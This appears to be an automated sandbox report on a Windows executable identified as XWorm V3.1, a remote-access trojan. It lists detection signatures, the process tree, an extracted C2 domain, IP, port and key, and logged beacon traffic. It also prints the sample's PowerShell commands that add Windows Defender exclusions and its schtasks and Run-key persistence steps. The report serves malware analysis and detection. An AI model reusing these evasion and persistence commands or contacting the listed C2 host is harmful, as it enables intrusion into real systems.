
Windows Analysis Report
SS Bottmac Engineers Pvt. Ltd..exe

Overview

General Information

Sample name: SS Bottmac Engineers Pvt. Ltd..exe
Analysis ID: 1545926
MD5: ff9e45d7326698f34526793bf1244811
SHA1: b3ff69abfe1c5e6633a866ffbebe2139a69e3f0a
SHA256: 4db566fcdc413fe50153dc8431ae86192241f0e1e86071f80d42eb6e0fb5baca
Tags: exe, user-lowmal3

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SS Bottmac Engineers Pvt. Ltd..exe (PID: 5148 cmdline: "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe" MD5: FF9E45D7326698F34526793BF1244811)
    • powershell.exe (PID: 5876 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6164 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTUZKYTc.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6800 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • SS Bottmac Engineers Pvt. Ltd..exe (PID: 7264 cmdline: "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe" MD5: FF9E45D7326698F34526793BF1244811)
      • powershell.exe (PID: 7500 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7804 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SS Bottmac Engineers Pvt. Ltd..exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • RTUZKYTc.exe (PID: 7324 cmdline: C:\Users\user\AppData\Roaming\RTUZKYTc.exe MD5: FF9E45D7326698F34526793BF1244811)
    • schtasks.exe (PID: 7676 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpAD5E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RTUZKYTc.exe (PID: 7728 cmdline: "C:\Users\user\AppData\Roaming\RTUZKYTc.exe" MD5: FF9E45D7326698F34526793BF1244811)
  • SS Bottmac Engineers Pvt. Ltd..exe (PID: 1992 cmdline: "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe" MD5: FF9E45D7326698F34526793BF1244811)
    • schtasks.exe (PID: 3652 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpE6A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • SS Bottmac Engineers Pvt. Ltd..exe (PID: 7320 cmdline: "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe" MD5: FF9E45D7326698F34526793BF1244811)
    • schtasks.exe (PID: 7608 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp2E66.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 url": ["kanrplest.duckdns.org"], "Port": "4068", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
Source | Rule | Description | Author | Strings
00000010.00000002.2163931121.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000010.00000002.2163931121.0000000000402000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x7720:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x77bd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x78d2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x73ce:$cnc4: POST / HTTP/1.1
00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x843c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x84d9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x85ee:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x80ea:$cnc4: POST / HTTP/1.1
00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
(19 further entries not shown)

Source | Rule | Description | Author | Strings
10.2.RTUZKYTc.exe.319a66c.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
10.2.RTUZKYTc.exe.319a66c.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x5b20:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x5bbd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x5cd2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x57ce:$cnc4: POST / HTTP/1.1
0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x5b20:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x5bbd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x5cd2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x57ce:$cnc4: POST / HTTP/1.1
27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.raw.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
(31 further entries not shown)

              System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", ParentImage: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe, ParentProcessId: 5148, ParentProcessName: SS Bottmac Engineers Pvt. Ltd..exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", ProcessId: 5876, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", ParentImage: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe, ParentProcessId: 7264, ParentProcessName: SS Bottmac Engineers Pvt. Ltd..exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe', ProcessId: 7500, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe, ProcessId: 7264, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SS Bottmac Engineers Pvt. Ltd.
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", ParentImage: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe, ParentProcessId: 5148, ParentProcessName: SS Bottmac Engineers Pvt. Ltd..exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", ProcessId: 5876, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe, ProcessId: 7264, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SS Bottmac Engineers Pvt. Ltd..lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpAD5E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpAD5E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\RTUZKYTc.exe, ParentImage: C:\Users\user\AppData\Roaming\RTUZKYTc.exe, ParentProcessId: 7324, ParentProcessName: RTUZKYTc.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpAD5E.tmp", ProcessId: 7676, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", ParentImage: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe, ParentProcessId: 5148, ParentProcessName: SS Bottmac Engineers Pvt. Ltd..exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp", ProcessId: 6800, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", ParentImage: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe, ParentProcessId: 5148, ParentProcessName: SS Bottmac Engineers Pvt. Ltd..exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", ProcessId: 5876, ProcessName: powershell.exe

              Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe", ParentImage: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe, ParentProcessId: 5148, ParentProcessName: SS Bottmac Engineers Pvt. Ltd..exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp", ProcessId: 6800, ProcessName: schtasks.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-31T10:34:03.831754+0100 | 2853193 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50035 | 104.223.35.76 | 4068 | TCP


              AV Detection

Source: 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["kanrplest.duckdns.org"], "Port": "4068", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe | ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe | ReversingLabs: Detection: 39%
Source: SS Bottmac Engineers Pvt. Ltd..exe | ReversingLabs: Detection: 39%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe | Joe Sandbox ML: detected
Source: SS Bottmac Engineers Pvt. Ltd..exe | Joe Sandbox ML: detected
Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack | String decryptor: kanrplest.duckdns.org
Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack | String decryptor: 4068
Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack | String decryptor: <123456789>
Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack | String decryptor: <Xwormmm>
Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack | String decryptor: USB.exe
Source: SS Bottmac Engineers Pvt. Ltd..exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SS Bottmac Engineers Pvt. Ltd..exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: OPHt.pdb | source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr
Source: Binary string: OPHt.pdbSHA256 | source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr

              Networking

Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:50014 -> 104.223.35.76:4068
Source: Network traffic | Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:50035 -> 104.223.35.76:4068
Source: Malware configuration extractor | URLs: kanrplest.duckdns.org
Source: unknown | DNS query: name: kanrplest.duckdns.org
Source: Yara match | File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, type: UNPACKEDPE
Source: global traffic | TCP traffic: 192.168.2.5:49764 -> 104.223.35.76:4068
Source: Joe Sandbox View | ASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: kanrplest.duckdns.org
Source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: powershell.exe, 0000000C.00000002.2130664829.00000000033AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: powershell.exe, 0000000C.00000002.2139010974.000000000600C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2191476893.000000000608C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr | String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000C.00000002.2131938852.00000000050F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2178385640.0000000005178000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4528212796.0000000003341000.00000004.00000800.00020000.00000000.sdmp, RTUZKYTc.exe, 0000000A.00000002.2150760883.0000000003182000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2131938852.0000000004FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2178385640.0000000005021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2240731614.0000000004771000.00000004.00000800.00020000.00000000.sdmp, SS Bottmac Engineers Pvt. Ltd..exe, 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp, SS Bottmac Engineers Pvt. Ltd..exe, 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000C.00000002.2131938852.00000000050F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2178385640.0000000005178000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr | String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000C.00000002.2131938852.0000000004FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2178385640.0000000005021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2240731614.0000000004771000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000C.00000002.2139010974.000000000600C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2191476893.000000000608C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

              Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout

              System Summary

